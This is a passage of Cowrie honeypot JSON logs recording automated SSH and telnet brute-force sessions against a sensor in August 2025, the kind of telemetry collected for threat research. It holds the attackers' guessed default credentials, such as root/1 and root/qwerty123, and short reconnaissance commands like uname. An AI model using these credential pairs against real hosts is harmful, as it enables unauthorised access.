0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:54.044955Z","src_ip":"212.227.125.160","session":"e45c947734db"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:54.963950Z","src_ip":"212.227.125.160","session":"e45c947734db"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:56.195021Z","src_ip":"212.227.125.160","session":"e45c947734db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41144,"dst_ip":"1.2.3.4","dst_port":22,"session":"28705f89a091","protocol":"ssh","message":"New connection: 212.227.235.229:41144 (1.2.3.4:22) [session: 28705f89a091]","sensor":"my-vps","timestamp":"2025-08-28T06:32:00.332334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:00.333315Z","src_ip":"212.227.235.229","session":"28705f89a091"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:00.585772Z","src_ip":"212.227.235.229","session":"28705f89a091"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwe123","message":"login attempt [oracle/qwe123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:32:01.346490Z","src_ip":"212.227.235.229","session":"28705f89a091"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:02.601424Z","src_ip":"212.227.235.229","session":"28705f89a091"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36500,"dst_ip":"1.2.3.4","dst_port":23,"session":"3162734484a2","protocol":"telnet","message":"New connection: 8.222.212.69:36500 (1.2.3.4:23) [session: 3162734484a2]","sensor":"my-vps","timestamp":"2025-08-28T06:32:07.083589Z"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":53884,"dst_ip":"1.2.3.4","dst_port":23,"session":"c71f6f690fc4","protocol":"telnet","message":"New connection: 139.59.27.234:53884 (1.2.3.4:23) [session: c71f6f690fc4]","sensor":"my-vps","timestamp":"2025-08-28T06:32:07.966461Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47808,"dst_ip":"1.2.3.4","dst_port":22,"session":"83795dc65933","protocol":"ssh","message":"New connection: 212.227.125.160:47808 (1.2.3.4:22) [session: 83795dc65933]","sensor":"my-vps","timestamp":"2025-08-28T06:32:10.159021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:10.159845Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:10.376164Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:32:11.025189Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:32:11.551835Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:32:11.552519Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:11.770752Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:11.771819Z","src_ip":"212.227.125.160","session":"83795dc65933"}
{"eventid":"cowrie.session.closed","duration":4.1238932609558105,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:12.090283Z","src_ip":"139.59.27.234","session":"c71f6f690fc4"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":53886,"dst_ip":"1.2.3.4","dst_port":23,"session":"c963f92c393c","protocol":"telnet","message":"New connection: 139.59.27.234:53886 (1.2.3.4:23) [session: c963f92c393c]","sensor":"my-vps","timestamp":"2025-08-28T06:32:12.377249Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:32:13.031538Z","src_ip":"139.59.27.234","session":"c963f92c393c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:32:13.115014Z","src_ip":"139.59.27.234","session":"c963f92c393c"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T06:32:13.440822Z","src_ip":"139.59.27.234","session":"c963f92c393c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:15.520153Z","src_ip":"139.59.27.234","session":"c963f92c393c"}
{"eventid":"cowrie.session.closed","duration":3.1478583812713623,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:15.525033Z","src_ip":"139.59.27.234","session":"c963f92c393c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58054,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc329caae874","protocol":"ssh","message":"New connection: 212.227.235.229:58054 (1.2.3.4:22) [session: dc329caae874]","sensor":"my-vps","timestamp":"2025-08-28T06:32:16.578085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:16.579099Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:16.831154Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:32:17.590285Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:32:18.114623Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:32:18.115346Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:18.369015Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:18.370137Z","src_ip":"212.227.235.229","session":"dc329caae874"}
{"eventid":"cowrie.session.closed","duration":34.9207022190094,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:21.735720Z","src_ip":"8.222.212.69","session":"02b9c7de2a60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52228,"dst_ip":"1.2.3.4","dst_port":22,"session":"30fd11a67c6f","protocol":"ssh","message":"New connection: 212.227.125.160:52228 (1.2.3.4:22) [session: 30fd11a67c6f]","sensor":"my-vps","timestamp":"2025-08-28T06:32:26.349331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:26.350911Z","src_ip":"212.227.125.160","session":"30fd11a67c6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:26.567337Z","src_ip":"212.227.125.160","session":"30fd11a67c6f"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:32:27.218978Z","src_ip":"212.227.125.160","session":"30fd11a67c6f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:28.438063Z","src_ip":"212.227.125.160","session":"30fd11a67c6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55886,"dst_ip":"1.2.3.4","dst_port":22,"session":"df8638c5e9ea","protocol":"ssh","message":"New connection: 212.227.235.229:55886 (1.2.3.4:22) [session: df8638c5e9ea]","sensor":"my-vps","timestamp":"2025-08-28T06:32:33.069530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:33.070560Z","src_ip":"212.227.235.229","session":"df8638c5e9ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:33.320507Z","src_ip":"212.227.235.229","session":"df8638c5e9ea"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:32:34.068831Z","src_ip":"212.227.235.229","session":"df8638c5e9ea"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:35.319916Z","src_ip":"212.227.235.229","session":"df8638c5e9ea"}
{"eventid":"cowrie.session.closed","duration":31.139956951141357,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:38.223471Z","src_ip":"8.222.212.69","session":"3162734484a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38904,"dst_ip":"1.2.3.4","dst_port":22,"session":"00c7dc21954b","protocol":"ssh","message":"New connection: 212.227.125.160:38904 (1.2.3.4:22) [session: 00c7dc21954b]","sensor":"my-vps","timestamp":"2025-08-28T06:32:42.924759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:42.925779Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:43.181007Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:32:43.835570Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:32:44.370362Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:32:44.371223Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:44.586883Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:44.587967Z","src_ip":"212.227.125.160","session":"00c7dc21954b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":45250,"dst_ip":"1.2.3.4","dst_port":23,"session":"589c7d04290e","protocol":"telnet","message":"New connection: 8.222.212.69:45250 (1.2.3.4:23) [session: 589c7d04290e]","sensor":"my-vps","timestamp":"2025-08-28T06:32:46.007902Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43120,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cd9db6e88c7","protocol":"ssh","message":"New connection: 212.227.235.229:43120 (1.2.3.4:22) [session: 4cd9db6e88c7]","sensor":"my-vps","timestamp":"2025-08-28T06:32:49.671414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:49.672102Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:32:49.920303Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:32:50.683266Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:32:51.277311Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:32:51.278095Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:51.527199Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:32:51.528422Z","src_ip":"212.227.235.229","session":"4cd9db6e88c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51854,"dst_ip":"1.2.3.4","dst_port":22,"session":"49bbacf966bf","protocol":"ssh","message":"New connection: 212.227.125.160:51854 (1.2.3.4:22) [session: 49bbacf966bf]","sensor":"my-vps","timestamp":"2025-08-28T06:32:59.594799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:32:59.596878Z","src_ip":"212.227.125.160","session":"49bbacf966bf"}
